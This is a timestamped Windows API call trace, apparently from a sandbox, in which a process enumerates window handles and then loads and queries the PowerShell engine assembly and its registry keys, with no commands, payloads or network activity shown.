	[0631.774] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x106c
	[0631.774] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1474
	[0631.774] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1414
	[0631.774] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xbd0
	[0631.774] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x550
	[0631.774] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa38
	[0631.774] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x16d0
	[0631.774] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x16d4
	[0631.775] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x15bc
	[0631.775] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x15a0
	[0631.775] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x159c
	[0631.775] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1598
	[0631.775] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1594
	[0631.775] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1590
	[0631.775] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x158c
	[0631.775] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1588
	[0631.775] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1584
	[0631.775] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1580
	[0631.775] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x157c
	[0631.776] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1488
	[0631.776] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1404
	[0631.776] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x11b8
	[0631.776] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xbd4
	[0631.776] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe0c
	[0631.776] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xd30
	[0631.776] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe70
	[0631.776] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x13b8
	[0631.776] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe20
	[0631.777] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe2c
	[0631.777] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe00
	[0631.777] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe04
	[0631.777] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc94
	[0631.777] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x13b0
	[0631.777] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x13ac
	[0631.777] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x13a8
	[0631.777] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1374
	[0631.777] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x132c
	[0631.777] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1328
	[0631.778] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x12d0
	[0631.778] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x12cc
	[0631.778] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x12c8
	[0631.778] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1290
	[0631.778] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1218
	[0631.778] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1214
	[0631.778] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x11ec
	[0631.778] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x11e8
	[0631.778] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x11cc
	[0631.778] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1140
	[0631.778] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe6c
	[0631.779] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x6e8
	[0631.779] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc6c
	[0631.779] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xf94
	[0631.779] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xffc
	[0631.779] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xf74
	[0631.779] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xf08
	[0631.779] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xf0c
	[0631.779] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xed8
	[0631.779] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe90
	[0631.779] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xea8
	[0631.780] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xfa8
	[0631.780] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xfbc
	[0631.780] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xfb8
	[0631.780] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xfb4
	[0631.780] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xfb0
	[0631.780] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xfac
	[0631.780] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xfc0
	[0631.780] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xfd0
	[0631.780] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xf88
	[0631.780] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xf84
	[0631.781] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xf80
	[0631.781] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xde0
	[0631.781] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xddc
	[0631.781] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xdd8
	[0631.781] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xd34
	[0631.781] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xd10
	[0631.781] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xd0c
	[0631.781] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc9c
	[0631.781] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc74
	[0631.781] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc1c
	[0631.782] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc08
	[0631.782] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xabc
	[0631.782] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x24c
	[0631.782] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xbb0
	[0631.782] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xbfc
	[0631.782] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xb10
	[0631.782] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x374
	[0631.782] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x368
	[0631.782] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xb28
	[0631.782] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xae8
	[0631.783] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xb14
	[0631.783] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x95c
	[0631.783] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa8c
	[0631.783] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x46c
	[0631.783] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xb3c
	[0631.783] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa90
	[0631.783] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xad0
	[0631.783] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa9c
	[0631.783] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xaa0
	[0631.784] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xb1c
	[0631.784] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x7e0
	[0631.784] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa74
	[0631.784] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x694
	[0631.784] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xa28
	[0631.784] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x9b0
	[0634.263] WerSetFlags () returned 0x0
	[0634.273] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0634.273] CoTaskMemFree (pv=0x0) 
	[0634.274] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x20de28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x20de20 | out: pulNumLanguages=0x20de28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x20de20) returned 1
	[0634.274] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x20de28, pwszLanguagesBuffer=0x2c844e0, pcchLanguagesBuffer=0x20de20 | out: pulNumLanguages=0x20de28, pwszLanguagesBuffer=0x2c844e0, pcchLanguagesBuffer=0x20de20) returned 1
	[0634.280] CoTaskMemAlloc (cb=0x24) returned 0x4e1e00
	[0634.280] GetUserDefaultLocaleName (in: lpLocaleName=0x4e1e00, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0634.281] CoTaskMemFree (pv=0x4e1e00) 
	[0636.277] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0636.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.278] CoTaskMemFree (pv=0x43e1c0) 
	[0636.281] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0636.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.281] CoTaskMemFree (pv=0x43e1c0) 
	[0636.283] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0636.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.283] CoTaskMemFree (pv=0x43e1c0) 
	[0636.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.298] SetErrorMode (uMode=0x1) returned 0x1
	[0636.298] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x20daa0 | out: lpFileInformation=0x20daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0636.298] SetErrorMode (uMode=0x1) returned 0x1
	[0636.298] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x20dd10 | out: lpdwHandle=0x20dd10) returned 0x94c
	[0638.122] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c87d70 | out: lpData=0x2c87d70) returned 1
	[0638.123] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20dc88, puLen=0x20dc80 | out: lplpBuffer=0x20dc88*=0x2c87e0c, puLen=0x20dc80) returned 1
	[0638.123] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x2c87ee8, puLen=0x20dbf0) returned 1
	[0638.123] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0638.123] CoTaskMemAlloc (cb=0x2e) returned 0x4e7250
	[0638.123] lstrcpyW (in: lpString1=0x4e7250, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0638.123] CoTaskMemFree (pv=0x4e7250) 
	[0638.123] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x2c87f3c, puLen=0x20dbf0) returned 1
	[0638.124] lstrlenW (lpString="System.Management.Automation") returned 28
	[0638.124] CoTaskMemAlloc (cb=0x3c) returned 0x4e5a90
	[0638.124] lstrcpyW (in: lpString1=0x4e5a90, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0638.124] CoTaskMemFree (pv=0x4e5a90) 
	[0638.124] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x2c87f98, puLen=0x20dbf0) returned 1
	[0638.124] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0638.124] CoTaskMemAlloc (cb=0x20) returned 0x4e1dd0
	[0638.124] lstrcpyW (in: lpString1=0x4e1dd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0638.124] CoTaskMemFree (pv=0x4e1dd0) 
	[0638.124] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x2c87fd8, puLen=0x20dbf0) returned 1
	[0638.124] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0638.124] CoTaskMemAlloc (cb=0x44) returned 0x4e5a90
	[0638.124] lstrcpyW (in: lpString1=0x4e5a90, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0638.124] CoTaskMemFree (pv=0x4e5a90) 
	[0638.124] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x2c88040, puLen=0x20dbf0) returned 1
	[0638.124] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0638.124] CoTaskMemAlloc (cb=0x76) returned 0x482220
	[0638.124] lstrcpyW (in: lpString1=0x482220, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0638.124] CoTaskMemFree (pv=0x482220) 
	[0638.125] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x2c880dc, puLen=0x20dbf0) returned 1
	[0638.125] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0638.125] CoTaskMemAlloc (cb=0x44) returned 0x4e5a90
	[0638.125] lstrcpyW (in: lpString1=0x4e5a90, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0638.125] CoTaskMemFree (pv=0x4e5a90) 
	[0638.125] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x2c88140, puLen=0x20dbf0) returned 1
	[0638.125] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0638.125] CoTaskMemAlloc (cb=0x58) returned 0x467400
	[0638.125] lstrcpyW (in: lpString1=0x467400, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0638.125] CoTaskMemFree (pv=0x467400) 
	[0638.125] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x2c881bc, puLen=0x20dbf0) returned 1
	[0638.125] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0638.125] CoTaskMemAlloc (cb=0x20) returned 0x4e1dd0
	[0638.125] lstrcpyW (in: lpString1=0x4e1dd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0638.125] CoTaskMemFree (pv=0x4e1dd0) 
	[0638.125] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x2c87e64, puLen=0x20dbf0) returned 1
	[0638.125] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0638.125] CoTaskMemAlloc (cb=0x66) returned 0x4e0fa0
	[0638.125] lstrcpyW (in: lpString1=0x4e0fa0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0638.126] CoTaskMemFree (pv=0x4e0fa0) 
	[0638.126] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x0, puLen=0x20dbf0) returned 0
	[0638.126] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x0, puLen=0x20dbf0) returned 0
	[0638.126] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x20dbf8, puLen=0x20dbf0 | out: lplpBuffer=0x20dbf8*=0x0, puLen=0x20dbf0) returned 0
	[0638.126] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20dbc8, puLen=0x20dbc0 | out: lplpBuffer=0x20dbc8*=0x2c87e0c, puLen=0x20dbc0) returned 1
	[0638.126] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0638.126] VerLanguageNameW (in: wLang=0x0, szLang=0x484760, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0638.126] CoTaskMemFree (pv=0x484760) 
	[0638.126] VerQueryValueW (in: pBlock=0x2c87d70, lpSubBlock="\\", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x2c87d98, puLen=0x20dc10) returned 1
	[0638.135] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0638.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.135] CoTaskMemFree (pv=0x43e1c0) 
	[0638.140] CoTaskMemAlloc (cb=0x104) returned 0x43e1c0
	[0638.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.140] CoTaskMemFree (pv=0x43e1c0) 
	[0638.145] lstrlenW (lpString="䅁") returned 1
	[0640.169] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20dae8 | out: phkResult=0x20dae8*=0x2f8) returned 0x0
	[0640.171] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x20dad8 | out: phkResult=0x20dad8*=0x2fc) returned 0x0
	[0640.171] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20db68 | out: phkResult=0x20db68*=0x300) returned 0x0
	[0640.176] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20daac, lpData=0x0, lpcbData=0x20daa8*=0x0 | out: lpType=0x20daac*=0x1, lpData=0x0, lpcbData=0x20daa8*=0x56) returned 0x0
	[0640.177] CoTaskMemAlloc (cb=0x5a) returned 0x4e0f30
	[0640.177] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20da7c, lpData=0x4e0f30, lpcbData=0x20da78*=0x56 | out: lpType=0x20da7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20da78*=0x56) returned 0x0
